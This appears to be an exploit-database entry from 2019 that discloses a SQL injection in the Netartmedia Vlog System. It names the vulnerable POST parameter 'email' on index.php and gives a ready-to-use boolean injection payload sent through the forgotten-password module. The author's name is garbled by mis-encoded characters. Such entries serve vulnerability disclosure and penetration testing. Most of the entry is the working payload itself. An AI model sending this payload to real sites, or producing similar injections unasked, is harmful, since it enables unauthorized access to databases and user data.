Netartmedia Vlog System - 'email' SQL Injection



EKU-ID: 50602 CVE: OSVDB-ID:
Author: Ahmet 躮it BAYRAM Published: 2019-03-21 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet 躮it BAYRAM
# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
# Demo Site: https://www.phpscriptdemos.com/vlogs/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
# Request: http://localhost/[PATH]/index.php
# Vulnerable Parameter: email (POST)
# Attack
Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password